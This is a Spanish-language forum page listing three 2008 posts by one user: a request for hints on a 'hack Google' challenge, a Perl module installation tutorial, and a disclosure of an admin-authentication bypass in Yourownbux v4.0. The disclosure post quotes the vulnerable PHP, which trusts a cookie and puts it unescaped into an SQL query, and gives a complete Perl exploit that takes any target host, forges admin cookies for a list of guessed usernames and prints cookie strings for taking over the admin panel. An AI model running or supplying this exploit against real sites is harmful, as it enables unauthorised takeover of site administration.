Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Tec-n0x

Páginas1
#1
WarZone / Hack Google, Help?
13 Septiembre 2008, 20:17 PM
Bueno, andaba viendo el reto de hack google ..

Emm .. Ya se donde esta el login ... Y tengo el archivo con posibles Passwords ...

Pero bueno, ni idea x]

Alguna pista? :P
#2
Nivel Web / [°] Yourownbux v4.0 => Cookie Modification Exploit
11 Septiembre 2008, 03:51 AM
Bueno, esto lo descubri hace un par de dias .. Ahora lo publico.

Vulnerable: /admin/header.php

Código (php) [Seleccionar]

<?php
 
$user $_COOKIE["usNick"];
 
  $myDb-&gt;connect();
 
 $sql "SELECT * FROM yob_users WHERE username='$user'";
 
 $result mysql_query($sql);
 
 $row mysql_fetch_array($result);
 
 $myDb-&gt;close(); 
 
 $is_admin $row['user_status'];
 
 if($is_admin != "admin"){
 
  $display_error "* You must login as administrator to access this page.";
 
  include ('error.php');  exit();
 
 }
 
?>

Como pueden ver, Solo se valida la cookie usNick, por lo tanto si tienes el usuario admin correcto, añadiendo las cookies puedes tener acceso al admin panel.

Y un pequeño Exploit para la explotacion es el siguiente:

Código (perl) [Seleccionar]

#!/usr/bin/perl

use LWP::UserAgent;
use HTTP::Request;

#+-------------------------------------------------------------+-#
#+ Yourownbux v4.0                   --------------------------+--+
#+ Cookie Modification Exploit --------------------------++
#+ Discovered By: Tec-n0x | 04/9/2008 --------------------++
#
# + Gr33tz: OzX, Celciuz, N.O.X && All Friends --++
#+-------------------------------------------------------------+----#



system("clear");

print "
# Yourownbux v4.0 Cookie Modification Exploit\n# Discovered By: Tec-n0x\n\n# Tec-n0x [ at ] hotmail [ dot ] com > DropSec.com
\n# Thanks OzX\n\n";
print "Target [ Example: www.sitedemo.com ] :\n> ";
$target = <STDIN>;
chop($target);

if($target =~ m/www\.(.*)\.(.*)/) {

$other = $1;
check1($target);

} else {
print "\nInvalid Target.";
exit();
}

sub explote {

@tryusers = ("admina", "administrator", "admins", "admin", "master", "manager", "root", "$other");
# Add Posible Users.

$check = shift;

foreach $user (@tryusers) {

$pass = "Tec-n0x";

print "\n\tTrying > $user\n";

$browser = LWP::UserAgent->new();
$browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");
$browser->default_header("Cookie" => "usNick=$user; usPass=$pass");
$get = HTTP::Request->new(GET => $check);
$resp = $browser->request($get);
$content = $resp->content();

@code = split("\n",$content);

foreach $checka (@code) {

if($checka =~ m/Emails|Served|Workload|Overview/) {

system("clear");

print "Succesfull EXPLOTED ...!!\n\nValid Username: $user\n\nGo to: $check\n\n And Put this on your browser:";

$vd = "javascript\:document\.cookie = \"usNick=$user\; path=\/\"\;";
$vda = "javascript\:document\.cookie = \"usPass=Dropsec\.com\; path=\/\"\;";

print "

+------------------------------------+
+ $vd\n+ $vda
+------------------------------------+
";


$yes = 1;

exit();

}
}
}

if($yes != 1) {

print "\n\n\nExploit Failed";

exit();

}

}
sub check1 {

$target = shift;

$check = "http\:\/\/$target\/admin\/index\.php";

$browser = LWP::UserAgent->new();
$browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");
$get = HTTP::Request->new(GET => $check);
$resp = $browser->request($get);
$content = $resp->content();

@code = split("\n",$content);

foreach $checka (@code) {

if($checka =~ m/You must login as administrator to access this page/) {

print "Check 1 [ OK ]\n";

$success = 1;

explote($check);

}

}

if($sucess != 1) {

print "Failed";

exit();

}

}


El Post original, Clickeando Aqui.

Saludos
#3
Scripting / Instalación de Librerías / Modulos en Perl
6 Agosto 2008, 23:08 PM
Bueno, sucede que en muchos casos necesitamos tener X Libreria para poder usar X script en perl.

Aqui vamos a instalar la libreria WhoIs.

Bueno, para esto vamos a usar el " Perl Module Manager ( PPM ) " Que viene integrado con el ActivePerl.

Las versiones del " PPM " varían, yo tengo el active perl 5.8.8 y en mi caso el " PPM " actúa en modo consola pero no igual que en las otras versiones del ActivePerl.

Si no me equivoco, en las anteriores funciona mas o menos asi:

Código [Seleccionar]

Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\XXXXXXXXXXXXXXX>cd..

C:\Documents and Settings>cd..

C:\>cd perl

C:\Perl>cd bin

C:\Perl\bin>ppm

ppm >


Y en mi versión [ 5.8.8 ] al teclear " PPM " salta una ventana:



--------------------------------------------------------------------------------------------------------
Instalando librerías.

Bueno, abrimos el CMD ( Inicio > ejecutar > cmd ) y nos situamos en el directorio /perl/bin ( Obviamente con ActivePerl ya Instalado ) ...

Tecleamos " PPM " nos saldra una ventana, la hacemos a un lado y en el CMD tecleamos:

PPM search [ Libreria]

En este caso: PPM search Whois

Veremos algo asi ( Nota, las librerias varían ) :

Código [Seleccionar]

1: Net-ParseWhois v0.62
2: Net-Whois v1.9
3: Net-Whois-ARIN v0.06
4: Net-Whois-IANA v0.21
5: Net-Whois-IP v1.04
6: Net-Whois-Norid v0.04
7: Net-Whois-Proxy v1.9
8: Net-Whois-RIPE v1.22
9: Net-Whois-RIPE-Syncupdates v1.1
10: Net-Whois-Raw v1.34
11: Net-Whois-RegistryFusion v0.04
12: Net-WhoisNG v0.09
13: Net-XWhois v0.90


Ahora, simplemente tecleamos  PPM search [ Numero de la libreria que quieres instalar ]

En este tenemos que instalar 2 ( Net-Whois v1.9 & Net-Whois-Raw v1.34 ]

Asi que hacemos:

PPM Install 2  Y Despues que se instale ..
PPM Install 10

Por ejemplo, si yo quisiera instalar la 3 ( Net-Whois-ARIN v0.06 ) mi log sería algo como este:

Código [Seleccionar]

Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\XXXXXXXXXXX>cd C:\perl\bin

C:\Perl\bin>ppm

C:\Perl\bin>ppm search whois
1: Net-ParseWhois v0.62
2: Net-Whois v1.9
3: Net-Whois-ARIN v0.06
4: Net-Whois-IANA v0.21
5: Net-Whois-IP v1.04
6: Net-Whois-Norid v0.04
7: Net-Whois-Proxy v1.9
8: Net-Whois-RIPE v1.22
9: Net-Whois-RIPE-Syncupdates v1.1
10: Net-Whois-Raw v1.34
11: Net-Whois-RegistryFusion v0.04
12: Net-WhoisNG v0.09
13: Net-XWhois v0.90

C:\Perl\bin>ppm install 3
Downloading Net-Whois-ARIN-0.06...done
Unpacking Net-Whois-ARIN-0.06...done
Generating HTML for Net-Whois-ARIN-0.06...done
Updating files in site area...done
   2 files installed

C:\Perl\bin>




Y Listo, ya tenemos la librería instalada ;)

Espero que les sirva ..

Saludos, Tec-n0x

Páginas1